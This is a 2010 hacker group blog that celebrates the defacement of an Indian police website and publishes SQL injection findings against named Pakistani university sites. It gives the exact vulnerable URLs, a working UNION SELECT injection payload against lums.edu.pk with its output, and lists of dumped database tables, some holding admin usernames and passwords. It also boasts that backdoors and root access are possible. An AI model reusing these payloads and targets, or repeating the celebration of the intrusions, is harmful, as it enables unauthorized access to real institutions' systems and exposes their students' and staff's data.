Followers

Tuesday, November 23, 2010

Linux Ki Command's (Urdu Ebook)

Salam,
Friend's ,I made a special Ebook for the Member's Of H4cking.Net about Linux Command's and there pupose.
The Langauge of book is Urdu,so all of you can easily understand.

 Download :-
Download From MEDIAFIRE
Download From Rapidshare

Thursday, November 18, 2010

indiapolice.in Hacked by Code5

Another milestone in history by UrduHack crew.
The defacing indiapolice.in .
Shame on indian cyber authorities.
http://indiapolice.in/owned/uh.aspx
Defaced screen shot :-
http://img593.imageshack.us/img593/8035/indiapolice.jpg
Good Work bro Code5.

Friday, November 12, 2010

Punjab University Is Unsecure

Well as you all know ,i found bugs in Lums and Fast university websites and send advisory to the university admins,
Now today i feel ashamed when penetrating Punjab University website,It was hard because they are really secure but i successfully found a bug .
Link:- 
http://www.pu.edu.pk/faculty/descriptions.asp?faculty=1000001
This link is vulnerable to MSSQL INJECTION.
Please secure it as soon as possible.
TABLE DUMPS
admission  
administrative    administrativetitle administrativepro administrativeid administrativedes
academiccalendar  
academic  
MA_EDU_II_S09  
MBBS_NR_S2009  
job  
aff_info  
faculty  
aboutmain  
depts  
glance  
newsnotices  
workshop  
Vw_PhdDepartmentFacultyWise  
Vw_AffiliationMed  
toplink2  
toplink  
tender  
systables  
seminar  
schedule  
results  
qlinks2  
qlinks  
publication  
programs  
press  
phd_fac  
phd_detail  
phd_dept  
med_affilited_status  
mainlink2  
mainlink  
glancelhr  
fee  
faculties  
facility  
examination  
examforms  
email  
deptclass  
deptabout  
degree  
datesheet  
conference  
collaboration-  
collaboration  
campuses  
bottomtext2  
bottomtext  
aff_subject  
aff_gender  
aff_district  
aff_college  
admissionss  
admissions  
admissionnotice   

Thursday, November 11, 2010

NU.EDU.PK is UnSecure

Well few days ago ,i found a vulnerability in Lums.Edu.Pk ,I have notify the Dept of Lums but still no action has been taken to secure it.
Today i am pentesting NU.EDU.PK and Found MSSQL INJECTION VULNERABILITY in FAST NATIONAL UNIVERSITY.
Here are the vulner links.
http://www.nu.edu.pk/campusStaff.aspx?camp=i
http://www.nu.edu.pk/campusStaff.aspx?camp=k
I hope they secure there website as soon as possible.


TABLE NAMES
NUSITE_COURSE_GROUP
FAN_Employmentinfo
DLS
STAFF_UNIT
conv_graduates
STAFF_TITLE
F_TEMP
STAFF_DESIGNATION
STAFF_LOCATION
STAFF_DEPARTMENT
STAFF_DEPT_HEAD
RADIX_ResultsSpring2008
NUSITE_NEWS
RSRusers
RSRscriptstatus
RSRscript
RSRcampus
RADIX_ResultsFALL2007
NUSITE_FEEDBACK
NUSITE_GROUP_COURSES__
FAN_ForumTopic
FAN_Graduateinfo
Query$
NUSITE_DVP
NUSITE_NEWS_070427
STAFF_PERSONAL
NUSITE_scholarshipType
TeamsTemp
FAN_medals
Depts
FAN_Degree
tempTable
FAN_ConvGuestsinfo
NUSITE_ScholarshipTitle
NUSITE_GROUP_COURSES
NUSITE_COURSE__
NUSITE_COURSETEMP8-04-10
FAN_MedalHolders
RADIX_Results_Fall09
RADIX_Campus
OSP_StudyCenters
OSP_MeritList
OSP_Candidates
FAN_AlumnusStatus
FAN_admin campusid adminPassword adminLogin adminid
Radix2010_Users
NUTES_Results
Radix2010_User UserName UserId Password Name Email Email
NUTES_Preference
FAN_NEWS
Radix2010_Comments
NUTES_Personal
Radix2010_Documents
NUTES_GradResults
FAN_Message
NUTES_MeritList
FAN_FEEDBACK
NUTES_GradMeritList
NUTES_GradDisciplineChoice
Sheet1$
FAN_ContactType
NUTES_DisciplineChoice
NUTES_Discipline
FAN_Contact
NUTES_Campus
FAN_Campus
FAN_Personalinfo
NUSITE_USERS
NUSITE_PRE_REQUISITE
NUSITE_OPENHOUSE
FAN_Registration
FAN_AlumnusPersonal
FAN_ViewAccess
NUSITE_GRAD_LIST
NUSITE_DVP_210710
FAN_SalaryRange
NATRES_GradMarks1Aug
TESTING
FAN_MessagesStatus
NATRES_UGMarksbckup23
RADIX_Results_july72010
FAN_MessageValidity
NATRES_GradMarksbck23
RADIX_Results12june2010
NATRES_UGMarks
RADIX_Results
FAN_GraduationYear
NATRES_GradMarks
NUSITE_COURSE
hitcounter
DLS_Year
FAN_Favourite
DLS_Student
FAN_FASTStudy
NATRES_GradMerit
DLS_Semnum
FAN_FASTStudyLevel
DLS_SemesterDegree
FAN_Education
NATRES_Degrees
DLS_Semester
NATRES_Campus
DLS_DegreeLevel
FAN_ForumResponse
DLS_Degree
RADIX_ResultsFall2008
DLS_Campus
FAN_Batch
NUSITE_ENEWS
OpenHouse
FAN_jobresume
FAN_ConvocationReg
FAN_ConvGuestsinfoBfore3Dec08
NU_CAMPUS
FAN_ConvocationRegBfore3Dec08
JobFair
NUSITE_ScholarshipStudents
Grad_List
NUSITE_COURSE_
dtproperties
NUSITE_NEWS17Aug07

Are You Secure In Cyber World Or Not?

We are ready to penetrate your server security ,we will provide you special patches and install special firewalls to secure your business better.
In today world where internet has reached in every aspect of life.
There are many companies who has online payment gateway ,but due to hacker's they lost there sensitive data which will be posted by them in warez or hacking forums.
Data like Credit Cards and Paypal account's.
So if you are intrested than contact with us via
CrankHost@hotmail.com for further details.

Monday, November 8, 2010

Lums.edu.pk is UnSecure

I have found a vulnerability in Lahore University Of Modern Sciences.
I heard it's a top leading University in Pakistan and feel very ashamed due to there unsecure website.
I have notify the university management to secure it.
Proof Of Concept of vulnerabilty.
http://lums.edu.pk/event_detail.php?id=317+and+1=0+union+select+1,2,version()--
This query show's you the MySql version which is installed in there server.
 5.0.32-Debian_7etch8-log
There are some other queries also through which an attacker can see there database tables ,columns and dump account's info.
And for some method you can even upload php backdoor and can root server.
I hope they secure there site as soon as possible.
Good Bye.

Flags Counter

free counters

Background Mp3 Player

About Me

My Photo
Dr Trojan
Find Me On GooGle,Search UrduHack.
View my complete profile

Root@Paki -- Dr Trojan-H4x0rL1f3 -- © 2008 Template by Dicas Blogger.

TOPO